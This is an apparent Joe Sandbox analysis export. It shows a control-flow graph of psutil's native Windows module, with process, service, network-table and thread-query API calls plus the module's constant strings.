QueryServiceConfigW 4845->4847 4848 7ffb9dd61070 11 API calls 4846->4848 4849 7ffb9dd6859d 4847->4849 4850 7ffb9dd685ae PyUnicode_FromWideChar 4847->4850 4851 7ffb9dd68568 CloseServiceHandle 4848->4851 4852 7ffb9dd61070 11 API calls 4849->4852 4855 7ffb9dd685db PyUnicode_FromWideChar 4850->4855 4856 7ffb9dd68708 CloseServiceHandle 4850->4856 4851->4844 4854 7ffb9dd685a9 4852->4854 4854->4856 4859 7ffb9dd685fd PyUnicode_FromWideChar 4855->4859 4860 7ffb9dd686bc 4855->4860 4856->4844 4857 7ffb9dd68716 free 4856->4857 4857->4844 4859->4860 4866 7ffb9dd6861f Py_BuildValue 4859->4866 4861 7ffb9dd686cc 4860->4861 4862 7ffb9dd686c3 _Py_Dealloc 4860->4862 4864 7ffb9dd686e0 4861->4864 4865 7ffb9dd686d7 _Py_Dealloc 4861->4865 4862->4861 4867 7ffb9dd686eb _Py_Dealloc 4864->4867 4868 7ffb9dd686f4 4864->4868 4865->4864 4866->4860 4871 7ffb9dd68677 4866->4871 4867->4868 4868->4856 4869 7ffb9dd686ff _Py_Dealloc 4868->4869 4869->4856 4872 7ffb9dd6867e _Py_Dealloc 4871->4872 4873 7ffb9dd68687 4871->4873 4872->4873 4874 7ffb9dd6868d _Py_Dealloc 4873->4874 4875 7ffb9dd68696 4873->4875 4874->4875 4876 7ffb9dd6869c _Py_Dealloc 4875->4876 4877 7ffb9dd686a5 free CloseServiceHandle 4875->4877 4876->4877 4877->4844 4888 7ffb9dd61220 PyArg_ParseTuple 4889 7ffb9dd6123d 4888->4889 4890 7ffb9dd61820 PyModule_GetState 4891 7ffb9dd61855 4890->4891 4892 7ffb9dd61844 PyModule_GetState 4890->4892 4892->4891 4893 7ffb9dd651a0 PyArg_ParseTuple 4894 7ffb9dd65250 4893->4894 4895 7ffb9dd651fe 4893->4895 4899 7ffb9dd6a0a0 8 API calls 4894->4899 4896 7ffb9dd65221 OpenProcess 4895->4896 4897 7ffb9dd65213 4895->4897 4900 7ffb9dd65257 4896->4900 4901 7ffb9dd65239 GetLastError 4896->4901 4898 7ffb9dd61180 12 API calls 4897->4898 4902 7ffb9dd6521f 4898->4902 4903 7ffb9dd6548b 4899->4903 4905 7ffb9dd67a40 45 API calls 4900->4905 4901->4900 4904 7ffb9dd65244 4901->4904 4902->4894 4907 7ffb9dd6526d OpenProcessToken 4902->4907 4906 7ffb9dd61070 11 API calls 4904->4906 4905->4902 4906->4894 4908 7ffb9dd65284 GetLastError 4907->4908 4909 7ffb9dd652b3 malloc 4907->4909 4912 7ffb9dd61010 __stdio_common_vsprintf 4908->4912 4910 7ffb9dd6531c PyErr_NoMemory 4909->4910 4911 7ffb9dd652c5 4909->4911 4914 7ffb9dd65322 CloseHandle 4910->4914 4913 7ffb9dd652d0 GetTokenInformation 4911->4913 4915 7ffb9dd652a4 PyErr_SetFromWindowsErrWithFilename 4912->4915 4916 7ffb9dd65350 CloseHandle CloseHandle 4913->4916 4917 7ffb9dd652f6 GetLastError 4913->4917 4914->4894 4918 7ffb9dd65335 CloseHandle 4914->4918 4915->4914 4916->4894 4921 7ffb9dd65369 malloc 4916->4921 4919 7ffb9dd65342 4917->4919 4920 7ffb9dd65301 free malloc 4917->4920 4918->4894 4922 7ffb9dd61070 11 API calls 4919->4922 4920->4910 4920->4913 4923 7ffb9dd65417 PyErr_NoMemory 4921->4923 4924 7ffb9dd6538a 4921->4924 4926 7ffb9dd6534e 4922->4926 4925 7ffb9dd6541d 4923->4925 4927 7ffb9dd65390 malloc 4924->4927 4930 7ffb9dd65422 free 4925->4930 4931 7ffb9dd6542b free 4925->4931 4926->4914 4928 7ffb9dd6557a PyErr_NoMemory 4927->4928 4929 7ffb9dd653a9 LookupAccountSidW 4927->4929 4936 7ffb9dd654bc 4928->4936 4932 7ffb9dd654d2 PyUnicode_FromWideChar 4929->4932 4933 7ffb9dd653dd GetLastError 4929->4933 4930->4931 4934 7ffb9dd65448 4931->4934 4935 7ffb9dd65439 4931->4935 4932->4936 4949 7ffb9dd654ff PyUnicode_FromWideChar 4932->4949 4937 7ffb9dd653ec free free malloc 4933->4937 4938 7ffb9dd654a3 GetLastError 4933->4938 4941 7ffb9dd6545c 4934->4941 4944 7ffb9dd65453 _Py_Dealloc 4934->4944 4935->4934 4939 7ffb9dd6543f _Py_Dealloc 4935->4939 4936->4925 4940 7ffb9dd65589 free 4936->4940 4937->4923 4937->4927 4942 7ffb9dd654b0 4938->4942 4943 7ffb9dd654c1 4938->4943 4939->4934 4940->4925 4941->4894 4948 7ffb9dd65468 _Py_Dealloc 4941->4948 4946 7ffb9dd61180 12 API calls 4942->4946 4947 7ffb9dd61070 11 API calls 4943->4947 4944->4941 4946->4936 4947->4936 4948->4894 4949->4936 4951 7ffb9dd6551e Py_BuildValue 4949->4951 4951->4936 4952 7ffb9dd65539 4951->4952 4953 7ffb9dd6553f _Py_Dealloc 4952->4953 4954 7ffb9dd65548 4952->4954 4953->4954 4955 7ffb9dd6554e _Py_Dealloc 4954->4955 4956 7ffb9dd65557 free free free 4954->4956 4955->4956 4956->4894 4957 7ffb9dd655a0 PyArg_ParseTuple 4958 7ffb9dd65608 4957->4958 4959 7ffb9dd655c3 4957->4959 4960 7ffb9dd655cb 4959->4960 4961 7ffb9dd655d9 OpenProcess 4959->4961 4964 7ffb9dd61180 12 API calls 4960->4964 4962 7ffb9dd655f1 GetLastError 4961->4962 4963 7ffb9dd65615 4961->4963 4962->4963 4965 7ffb9dd655fc 4962->4965 4966 7ffb9dd67a40 45 API calls 4963->4966 4967 7ffb9dd655d7 4964->4967 4968 7ffb9dd61070 11 API calls 4965->4968 4966->4967 4967->4958 4969 7ffb9dd65627 GetPriorityClass 4967->4969 4968->4958 4970 7ffb9dd65654 CloseHandle Py_BuildValue 4969->4970 4971 7ffb9dd65636 PyErr_SetFromWindowsErr CloseHandle 4969->4971 4972 7ffb9dd672a0 PyArg_ParseTuple 4973 7ffb9dd672ce 4972->4973 4974 7ffb9dd67395 4972->4974 4975 7ffb9dd672d6 OpenProcess 4973->4975 4990 7ffb9dd67335 4973->4990 4977 7ffb9dd672eb 4975->4977 4978 7ffb9dd6730d PyErr_Clear 4975->4978 4976 7ffb9dd66ae0 79 API calls 4980 7ffb9dd67354 4976->4980 4981 7ffb9dd67a40 45 API calls 4977->4981 4979 7ffb9dd678f0 12 API calls 4978->4979 4982 7ffb9dd6731a 4979->4982 4983 7ffb9dd67379 4980->4983 4992 7ffb9dd6736d PyUnicode_FromWideChar 4980->4992 4984 7ffb9dd672f5 4981->4984 4989 7ffb9dd6731e 4982->4989 4982->4990 4987 7ffb9dd6737e free 4983->4987 4988 7ffb9dd67387 4983->4988 4985 7ffb9dd672fa CloseHandle 4984->4985 4986 7ffb9dd67305 CloseHandle 4984->4986 4985->4990 4986->4978 4987->4988 4991 7ffb9dd610e0 12 API calls 4989->4991 4990->4974 4990->4976 4993 7ffb9dd6732a 4991->4993 4992->4983 4994 7ffb9dd69f20 PdhOpenQueryW 4995 7ffb9dd69f37 PyErr_Format 4994->4995 4996 7ffb9dd69f55 PdhAddEnglishCounterW 4994->4996 4996->4995 4998 7ffb9dd69f7c CreateEventW 4996->4998 4999 7ffb9dd69f9d 4998->4999 5000 7ffb9dd69fb5 PdhCollectQueryDataEx 4998->5000 5001 7ffb9dd61070 11 API calls 4999->5001 5002 7ffb9dd69fef RegisterWaitForSingleObject 5000->5002 5003 7ffb9dd69fcc PyErr_Format 5000->5003 5004 7ffb9dd69fa9 5001->5004 5005 7ffb9dd6a01d 5002->5005 5006 7ffb9dd6a035 5002->5006 5007 7ffb9dd61070 11 API calls 5005->5007 5008 7ffb9dd6a029 5007->5008 5009 7ffb9dd68fa0 PyLong_FromLong PyLong_FromLong PyLong_FromLong PyLong_FromLong PyArg_ParseTuple 5010 7ffb9dd6905b PySequence_Check 5009->5010 5011 7ffb9dd693bf 5009->5011 5012 7ffb9dd6906e PySequence_Check 5010->5012 5013 7ffb9dd6990a 5010->5013 5017 7ffb9dd693df 5011->5017 5018 7ffb9dd693d6 _Py_Dealloc 5011->5018 5012->5013 5014 7ffb9dd69081 5012->5014 5015 7ffb9dd6991e 5013->5015 5016 7ffb9dd69915 _Py_Dealloc 5013->5016 5019 7ffb9dd690f0 PyList_New 5014->5019 5028 7ffb9dd67d20 49 API calls 5014->5028 5020 7ffb9dd69932 5015->5020 5021 7ffb9dd69929 _Py_Dealloc 5015->5021 5016->5015 5022 7ffb9dd693ee 5017->5022 5023 7ffb9dd693e5 _Py_Dealloc 5017->5023 5018->5017 5026 7ffb9dd69152 PySequence_Contains 5019->5026 5027 7ffb9dd69102 5019->5027 5029 7ffb9dd69941 5020->5029 5030 7ffb9dd69938 _Py_Dealloc 5020->5030 5021->5020 5024 7ffb9dd693fd 5022->5024 5025 7ffb9dd693f4 _Py_Dealloc 5022->5025 5023->5022 5035 7ffb9dd6940d 5024->5035 5036 7ffb9dd69404 _Py_Dealloc 5024->5036 5025->5024 5031 7ffb9dd692ff PySequence_Contains 5026->5031 5032 7ffb9dd6916b PySequence_Contains 5026->5032 5037 7ffb9dd6910d _Py_Dealloc 5027->5037 5038 7ffb9dd69116 5027->5038 5039 7ffb9dd6908f 5028->5039 5033 7ffb9dd69951 PyErr_SetString 5029->5033 5034 7ffb9dd69948 _Py_Dealloc 5029->5034 5030->5029 5047 7ffb9dd695d1 PySequence_Contains 5031->5047 5048 7ffb9dd69318 PySequence_Contains 5031->5048 5032->5031 5040 7ffb9dd69182 5032->5040 5041 7ffb9dd690e6 5033->5041 5034->5033 5042 7ffb9dd69421 5035->5042 5050 7ffb9dd69418 _Py_Dealloc 5035->5050 5036->5035 5037->5038 5043 7ffb9dd69121 _Py_Dealloc 5038->5043 5044 7ffb9dd6912a 5038->5044 5045 7ffb9dd690eb 5039->5045 5046 7ffb9dd69093 5039->5046 5122 7ffb9dd68ca0 5040->5122 5059 7ffb9dd6a0a0 8 API calls 5041->5059 5053 7ffb9dd69435 5042->5053 5061 7ffb9dd6942c _Py_Dealloc 5042->5061 5043->5044 5056 7ffb9dd69130 _Py_Dealloc 5044->5056 5057 7ffb9dd69139 5044->5057 5045->5019 5045->5027 5054 7ffb9dd6909e _Py_Dealloc 5046->5054 5055 7ffb9dd690a7 5046->5055 5051 7ffb9dd6972e PySequence_Contains 5047->5051 5052 7ffb9dd695ea PySequence_Contains 5047->5052 5048->5047 5058 7ffb9dd6932f 5048->5058 5050->5042 5062 7ffb9dd698bc 5051->5062 5063 7ffb9dd6974a PySequence_Contains 5051->5063 5052->5051 5060 7ffb9dd69601 5052->5060 5064 7ffb9dd6944a 5053->5064 5073 7ffb9dd69441 _Py_Dealloc 5053->5073 5054->5055 5065 7ffb9dd690b2 _Py_Dealloc 5055->5065 5066 7ffb9dd690bb 5055->5066 5056->5057 5057->5041 5067 7ffb9dd69144 _Py_Dealloc 5057->5067 5058->5047 5076 7ffb9dd68ca0 10 API calls 5058->5076 5070 7ffb9dd6947a 5059->5070 5141 7ffb9dd68e20 5060->5141 5061->5053 5068 7ffb9dd698d0 5062->5068 5069 7ffb9dd698c7 _Py_Dealloc 5062->5069 5063->5062 5072 7ffb9dd69761 5063->5072 5074 7ffb9dd6945e 5064->5074 5075 7ffb9dd69455 _Py_Dealloc 5064->5075 5065->5066 5077 7ffb9dd690c1 _Py_Dealloc 5066->5077 5078 7ffb9dd690ca 5066->5078 5067->5041 5081 7ffb9dd698df 5068->5081 5082 7ffb9dd698d6 _Py_Dealloc 5068->5082 5069->5068 5072->5062 5088 7ffb9dd68e20 10 API calls 5072->5088 5073->5064 5074->5041 5084 7ffb9dd69463 free 5074->5084 5075->5074 5110 7ffb9dd6934c 5076->5110 5077->5078 5079 7ffb9dd690d1 _Py_Dealloc 5078->5079 5080 7ffb9dd690da 5078->5080 5079->5080 5085 7ffb9dd610e0 12 API calls 5080->5085 5086 7ffb9dd698f0 5081->5086 5087 7ffb9dd698ea _Py_Dealloc 5081->5087 5082->5081 5083 7ffb9dd692f1 free 5083->5031 5084->5041 5085->5041 5086->5041 5090 7ffb9dd698f7 _Py_Dealloc 5086->5090 5087->5086 5105 7ffb9dd6977e 5088->5105 5089 7ffb9dd695c8 free 5089->5047 5090->5041 5091 7ffb9dd69725 free 5091->5051 5092 7ffb9dd691de RtlIpv4AddressToStringA Py_BuildValue 5097 7ffb9dd6918a 5092->5097 5093 7ffb9dd698b3 free 5093->5062 5094 7ffb9dd691d4 PyTuple_New 5094->5097 5095 7ffb9dd6949b RtlIpv6AddressToStringA Py_BuildValue 5095->5110 5096 7ffb9dd69669 RtlIpv4AddressToStringA Py_BuildValue 5108 7ffb9dd69610 5096->5108 5097->5011 5097->5083 5097->5092 5097->5094 5099 7ffb9dd69232 RtlIpv4AddressToStringA Py_BuildValue 5097->5099 5100 7ffb9dd6926a PyTuple_New 5097->5100 5107 7ffb9dd6927e Py_BuildValue 5097->5107 5118 7ffb9dd692d8 _Py_Dealloc 5097->5118 5098 7ffb9dd6965f PyTuple_New 5098->5108 5099->5097 5100->5097 5101 7ffb9dd696a9 PyTuple_New Py_BuildValue 5101->5011 5104 7ffb9dd696f1 PyList_Append 5101->5104 5102 7ffb9dd697ed RtlIpv6AddressToStringA Py_BuildValue 5102->5105 5103 7ffb9dd693b2 PyTuple_New 5103->5110 5104->5011 5104->5108 5105->5011 5105->5093 5105->5102 5106 7ffb9dd698ae 5105->5106 5109 7ffb9dd697e3 PyTuple_New 5105->5109 5111 7ffb9dd69834 PyTuple_New Py_BuildValue 5105->5111 5119 7ffb9dd69895 _Py_Dealloc 5105->5119 5106->5093 5107->5011 5114 7ffb9dd692bc PyList_Append 5107->5114 5108->5011 5108->5091 5108->5096 5108->5098 5108->5101 5115 7ffb9dd6970d _Py_Dealloc 5108->5115 5109->5105 5110->5011 5110->5089 5110->5095 5110->5103 5112 7ffb9dd69541 PyTuple_New 5110->5112 5113 7ffb9dd69506 RtlIpv6AddressToStringA Py_BuildValue 5110->5113 5117 7ffb9dd69555 Py_BuildValue 5110->5117 5121 7ffb9dd695af _Py_Dealloc 5110->5121 5111->5011 5116 7ffb9dd69879 PyList_Append 5111->5116 5112->5110 5113->5110 5114->5011 5114->5097 5115->5108 5116->5011 5116->5105 5117->5011 5120 7ffb9dd69593 PyList_Append 5117->5120 5118->5097 5119->5105 5120->5011 5120->5110 5121->5110 5123 7ffb9dd68cee malloc 5122->5123 5124 7ffb9dd68cba GetExtendedTcpTable 5122->5124 5125 7ffb9dd68d11 GetExtendedTcpTable 5123->5125 5126 7ffb9dd68cfe PyErr_NoMemory 5123->5126 5124->5123 5127 7ffb9dd68d40 5125->5127 5128 7ffb9dd68d53 free 5125->5128 5126->5097 5127->5097 5129 7ffb9dd68d61 5128->5129 5130 7ffb9dd68d92 5128->5130 5129->5130 5131 7ffb9dd68d69 PyErr_SetString 5129->5131 5132 7ffb9dd68d9b __acrt_iob_func 5130->5132 5133 7ffb9dd68df6 5130->5133 5131->5097 5135 7ffb9dd61d70 fprintf __stdio_common_vfprintf 5132->5135 5134 7ffb9dd68ca0 __stdio_common_vfprintf 5133->5134 5136 7ffb9dd68e07 5134->5136 5137 7ffb9dd68dc2 __acrt_iob_func 5135->5137 5136->5097 5138 7ffb9dd61d70 fprintf __stdio_common_vfprintf 5137->5138 5139 7ffb9dd68ddc __acrt_iob_func 5138->5139 5140 7ffb9dd61d70 fprintf __stdio_common_vfprintf 5139->5140 5140->5133 5142 7ffb9dd68e6e malloc 5141->5142 5143 7ffb9dd68e3a GetExtendedUdpTable 5141->5143 5144 7ffb9dd68e91 GetExtendedUdpTable 5142->5144 5145 7ffb9dd68e7e PyErr_NoMemory 5142->5145 5143->5142 5146 7ffb9dd68ec0 5144->5146 5147 7ffb9dd68ed3 free 5144->5147 5145->5108 5146->5108 5148 7ffb9dd68ee1 5147->5148 5149 7ffb9dd68f12 5147->5149 5148->5149 5150 7ffb9dd68ee9 PyErr_SetString 5148->5150 5151 7ffb9dd68f1b __acrt_iob_func 5149->5151 5152 7ffb9dd68f76 5149->5152 5150->5108 5153 7ffb9dd61d70 fprintf __stdio_common_vfprintf 5151->5153 5154 7ffb9dd68e20 __stdio_common_vfprintf 5152->5154 5155 7ffb9dd68f42 __acrt_iob_func 5153->5155 5156 7ffb9dd68f87 5154->5156 5157 7ffb9dd61d70 fprintf __stdio_common_vfprintf 5155->5157 5156->5108 5158 7ffb9dd68f5c __acrt_iob_func 5157->5158 5159 7ffb9dd61d70 fprintf __stdio_common_vfprintf 5158->5159 5159->5152 5202 7ffb9dd688a8 5203 7ffb9dd688ee Py_BuildValue 5202->5203 5204 7ffb9dd68929 CloseServiceHandle GetProcessHeap HeapFree 5203->5204 5205 7ffb9dd68907 CloseServiceHandle GetProcessHeap HeapFree 5203->5205 5206 7ffb9dd6881e 5205->5206 5207 7ffb9dd62a30 PyArg_ParseTuple 5208 7ffb9dd62af3 5207->5208 5209 7ffb9dd62a53 PyUnicode_AsWideCharString 5207->5209 5209->5208 5210 7ffb9dd62a6c PyEval_SaveThread GetDiskFreeSpaceExW PyEval_RestoreThread PyMem_Free 5209->5210 5211 7ffb9dd62ab9 PyErr_SetExcFromWindowsErrWithFilenameObject 5210->5211 5212 7ffb9dd62ad6 Py_BuildValue 5210->5212 5213 7ffb9dd63430 Py_BuildValue 5214 7ffb9dd64e30 PyList_New 5215 7ffb9dd64e84 PyArg_ParseTuple 5214->5215 5228 7ffb9dd64f2b 5214->5228 5217 7ffb9dd64ead 5215->5217 5230 7ffb9dd64ec1 5215->5230 5216 7ffb9dd6a0a0 8 API calls 5218 7ffb9dd64f4a 5216->5218 5221 7ffb9dd64ec3 5217->5221 5222 7ffb9dd64eb5 5217->5222 5219 7ffb9dd64f0f 5224 7ffb9dd64f1d 5219->5224 5225 7ffb9dd64f14 CloseHandle 5219->5225 5220 7ffb9dd64f06 _Py_Dealloc 5220->5219 5223 7ffb9dd67d20 49 API calls 5221->5223 5226 7ffb9dd61180 12 API calls 5222->5226 5229 7ffb9dd64ec8 5223->5229 5227 7ffb9dd64f22 CloseHandle 5224->5227 5224->5228 5225->5224 5226->5230 5227->5228 5228->5216 5231 7ffb9dd64ecc 5229->5231 5232 7ffb9dd64eda 5229->5232 5230->5219 5230->5220 5233 7ffb9dd610e0 12 API calls 5231->5233 5232->5230 5234 7ffb9dd64edf CreateToolhelp32Snapshot 5232->5234 5233->5230 5235 7ffb9dd64f63 Thread32First 5234->5235 5236 7ffb9dd64ef3 5234->5236 5235->5236 5237 7ffb9dd64f89 5235->5237 5238 7ffb9dd61070 11 API calls 5236->5238 5239 7ffb9dd65091 Thread32Next 5237->5239 5240 7ffb9dd64fae OpenThread 5237->5240 5238->5230 5239->5237 5241 7ffb9dd650a7 CloseHandle 5239->5241 5240->5239 5242 7ffb9dd64fca GetThreadTimes 5240->5242 5241->5228 5243 7ffb9dd64ff4 Py_BuildValue 5242->5243 5244 7ffb9dd650d6 5242->5244 5243->5230 5245 7ffb9dd65063 PyList_Append 5243->5245 5246 7ffb9dd650b8 5245->5246 5247 7ffb9dd65076 5245->5247 5246->5230 5248 7ffb9dd650c8 _Py_Dealloc 5246->5248 5249 7ffb9dd6507f _Py_Dealloc 5247->5249 5250 7ffb9dd65088 CloseHandle 5247->5250 5248->5230 5249->5250 5250->5239 5251 7ffb9dd65f30 5252 7ffb9dd65f52 Py_BuildValue 5251->5252 5253 7ffb9dd65f77 PyList_Append 5252->5253 5254 7ffb9dd65ff3 5252->5254 5255 7ffb9dd65fde 5253->5255 5270 7ffb9dd65e86 5253->5270 5256 7ffb9dd66002 5254->5256 5257 7ffb9dd65ff9 _Py_Dealloc 5254->5257 5255->5254 5259 7ffb9dd65fea _Py_Dealloc 5255->5259 5260 7ffb9dd66011 5256->5260 5261 7ffb9dd66008 _Py_Dealloc 5256->5261 5257->5256 5258 7ffb9dd65f93 _Py_Dealloc 5258->5270 5259->5254 5264 7ffb9dd6601f 5260->5264 5265 7ffb9dd66016 CloseHandle 5260->5265 5261->5260 5262 7ffb9dd65fa2 _Py_Dealloc 5263 7ffb9dd65fab VirtualQueryEx 5262->5263 5266 7ffb9dd65fd0 CloseHandle 5263->5266 5263->5270 5268 7ffb9dd6a0a0 8 API calls 5264->5268 5265->5264 5266->5264 5267 7ffb9dd65e8f GetMappedFileNameW 5267->5263 5267->5270 5269 7ffb9dd66049 5268->5269 5270->5252 5270->5258 5270->5262 5270->5263 5270->5266 5270->5267 5270->5270 5271 7ffb9dd65eca PyUnicode_FromWideChar 5270->5271 5271->5256 5271->5270 5272 7ffb9dd64ab0 PyArg_ParseTuple 5273 7ffb9dd64b1c 5272->5273 5274 7ffb9dd64ad4 5272->5274 5275 7ffb9dd64adf 5274->5275 5276 7ffb9dd64aed OpenProcess 5274->5276 5277 7ffb9dd61180 12 API calls 5275->5277 5278 7ffb9dd64b26 5276->5278 5279 7ffb9dd64b05 GetLastError 5276->5279 5281 7ffb9dd64aeb 5277->5281 5280 7ffb9dd67a40 45 API calls 5278->5280 5279->5278 5282 7ffb9dd64b10 5279->5282 5280->5281 5281->5273 5284 7ffb9dd64b38 GetProcessHeap HeapAlloc 5281->5284 5283 7ffb9dd61070 11 API calls 5282->5283 5283->5273 5285 7ffb9dd64b7a NtQueryVirtualMemory 5284->5285 5286 7ffb9dd64d29 PyErr_NoMemory CloseHandle 5284->5286 5288 7ffb9dd64ba2 GetProcessHeap HeapFree 5285->5288 5289 7ffb9dd64c0a 5285->5289 5287 7ffb9dd64d0f 5286->5287 5290 7ffb9dd64bc2 GetProcessHeap HeapAlloc 5288->5290 5291 7ffb9dd64c28 PyErr_SetString CloseHandle 5288->5291 5292 7ffb9dd64c12 5289->5292 5302 7ffb9dd64c9e GetProcessHeap HeapFree CloseHandle Py_BuildValue 5289->5302 5290->5286 5293 7ffb9dd64be5 NtQueryVirtualMemory 5290->5293 5291->5287 5295 7ffb9dd64c4f 5292->5295 5296 7ffb9dd64c1a 5292->5296 5293->5288 5293->5289 5297 7ffb9dd67d20 49 API calls 5295->5297 5298 7ffb9dd61180 12 API calls 5296->5298 5299 7ffb9dd64c57 5297->5299 5306 7ffb9dd64c26 5298->5306 5300 7ffb9dd64c5b 5299->5300 5301 7ffb9dd64c69 PyErr_Clear 5299->5301 5304 7ffb9dd610e0 12 API calls 5300->5304 5305 7ffb9dd61350 11 API calls 5301->5305 5302->5287 5303 7ffb9dd64c7d GetProcessHeap HeapFree CloseHandle 5303->5287 5304->5306 5305->5303 5306->5303 5307 7ffb9dd673b0 PyArg_ParseTuple 5308 7ffb9dd6746e 5307->5308 5309 7ffb9dd673da 5307->5309 5310 7ffb9dd67454 Py_BuildValue 5309->5310 5311 7ffb9dd673e6 5309->5311 5312 7ffb9dd67d20 49 API calls 5311->5312 5313 7ffb9dd673eb 5312->5313 5314 7ffb9dd673ef 5313->5314 5316 7ffb9dd67401 5313->5316 5315 7ffb9dd610e0 12 API calls 5314->5315 5317 7ffb9dd673fb 5315->5317 5316->5308 5318 7ffb9dd66ae0 79 API calls 5316->5318 5319 7ffb9dd6741e 5318->5319 5320 7ffb9dd67422 PyUnicode_FromWideChar 5319->5320 5321 7ffb9dd67438 5319->5321 5320->5321 5322 7ffb9dd67440 free 5321->5322 5323 7ffb9dd6744b 5321->5323 5322->5323 5329 7ffb9dd68bb0 PyArg_ParseTuple 5330 7ffb9dd68bf0 5329->5330 5331 7ffb9dd68bdc 5329->5331 5333 7ffb9dd680f0 17 API calls 5330->5333 5332 7ffb9dd6a0a0 8 API calls 5331->5332 5334 7ffb9dd68beb 5332->5334 5335 7ffb9dd68c0a 5333->5335 5336 7ffb9dd68c12 PyEval_SaveThread ControlService PyEval_RestoreThread 5335->5336 5337 7ffb9dd68c66 5335->5337 5338 7ffb9dd68c51 5336->5338 5339 7ffb9dd68c7f CloseServiceHandle 5336->5339 5340 7ffb9dd6a0a0 8 API calls 5337->5340 5341 7ffb9dd61070 11 API calls 5338->5341 5339->5337 5342 7ffb9dd68c7a 5340->5342 5343 7ffb9dd68c5d CloseServiceHandle 5341->5343 5343->5337 5344 7ffb9db3c650 5345 7ffb9db3c66c 5344->5345 5346 7ffb9db3c671 5344->5346 5348 7ffb9db3c9ac 5345->5348 5349 7ffb9db3c9cf GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 5348->5349 5350 7ffb9db3ca43 5348->5350 5349->5350 5350->5346

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Module_$Constant$Err_$Exception$Eval_ObjectThread$Create2CriticalDeallocFilenameFromInfoInitializeLibraryLoadRestoreSaveSectionStateSystemVersionWindowsWithgetenv
                                                                                                                                                                                                                • String ID: ABOVE_NORMAL_PRIORITY_CLASS$BELOW_NORMAL_PRIORITY_CLASS$ERROR_ACCESS_DENIED$ERROR_INVALID_NAME$ERROR_PRIVILEGE_NOT_HELD$ERROR_SERVICE_DOES_NOT_EXIST$HIGH_PRIORITY_CLASS$IDLE_PRIORITY_CLASS$INFINITE$MIB_TCP_STATE_CLOSED$MIB_TCP_STATE_CLOSE_WAIT$MIB_TCP_STATE_CLOSING$MIB_TCP_STATE_DELETE_TCB$MIB_TCP_STATE_ESTAB$MIB_TCP_STATE_FIN_WAIT1$MIB_TCP_STATE_FIN_WAIT2$MIB_TCP_STATE_LAST_ACK$MIB_TCP_STATE_LISTEN$MIB_TCP_STATE_SYN_RCVD$MIB_TCP_STATE_SYN_SENT$MIB_TCP_STATE_TIME_WAIT$NORMAL_PRIORITY_CLASS$PSUTIL_CONN_NONE$PSUTIL_DEBUG$REALTIME_PRIORITY_CLASS$TimeoutAbandoned$TimeoutExpired$WINDOWS_10$WINDOWS_7$WINDOWS_8$WINDOWS_8_1$WINDOWS_VISTA$WINVER$_psutil_windows.Error$_psutil_windows.TimeoutAbandoned$_psutil_windows.TimeoutExpired$version
                                                                                                                                                                                                                • API String ID: 887074641-2468274236
                                                                                                                                                                                                                • Opcode ID: fb4df1ca4054460973fcab0e695841df0ac547bd58356957f88027a8c9bf5363
                                                                                                                                                                                                                • Instruction ID: d45a03752cf187df640b450e4dd06124c08ac976cbe53bb8362d24614e7b788a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: fb4df1ca4054460973fcab0e695841df0ac547bd58356957f88027a8c9bf5363
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3DC1F8E4B18E0281EA709B33EA543782365AF4DBD5FC16035C98E477A4FF6DA149CB81

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 95 7ffb9dd61e90-7ffb9dd61eac PyList_New 96 7ffb9dd61eae-7ffb9dd61eb6 95->96 97 7ffb9dd61eb7-7ffb9dd61edd 95->97 98 7ffb9dd61edf-7ffb9dd61eeb 97->98 99 7ffb9dd61f3e-7ffb9dd61f44 97->99 103 7ffb9dd61fcd-7ffb9dd61fe4 malloc 98->103 110 7ffb9dd61ef1-7ffb9dd61ef3 PyErr_SetFromWindowsErr 98->110 100 7ffb9dd61fa1-7ffb9dd61fab 99->100 101 7ffb9dd61f46-7ffb9dd61f9c __acrt_iob_func call 7ffb9dd61d70 __acrt_iob_func call 7ffb9dd61d70 __acrt_iob_func call 7ffb9dd61d70 99->101 100->103 104 7ffb9dd61fad-7ffb9dd61fc7 PyErr_SetString 100->104 101->100 108 7ffb9dd61ff1-7ffb9dd6200b NtQuerySystemInformation 103->108 109 7ffb9dd61fe6-7ffb9dd61fec PyErr_NoMemory 103->109 104->103 107 7ffb9dd61ef9-7ffb9dd61efe 104->107 111 7ffb9dd61f00-7ffb9dd61f03 _Py_Dealloc 107->111 112 7ffb9dd61f09-7ffb9dd61f0c 107->112 113 7ffb9dd62020-7ffb9dd62023 108->113 114 7ffb9dd6200d-7ffb9dd6201b call 7ffb9dd61350 108->114 109->107 110->107 111->112 117 7ffb9dd61f0e-7ffb9dd61f11 free 112->117 118 7ffb9dd61f17-7ffb9dd61f3d 112->118 119 7ffb9dd62029-7ffb9dd6203d 113->119 120 7ffb9dd62146-7ffb9dd6214f free 113->120 114->107 117->118 123 7ffb9dd62040-7ffb9dd6210c Py_BuildValue 119->123 126 7ffb9dd62157-7ffb9dd62161 120->126 123->107 125 7ffb9dd62112-7ffb9dd62123 PyList_Append 123->125 125->126 127 7ffb9dd62125-7ffb9dd6212c 125->127 126->107 128 7ffb9dd62167-7ffb9dd62170 _Py_Dealloc 126->128 129 7ffb9dd6212e-7ffb9dd62131 _Py_Dealloc 127->129 130 7ffb9dd62137-7ffb9dd62140 127->130 128->107 129->130 130->120 130->123
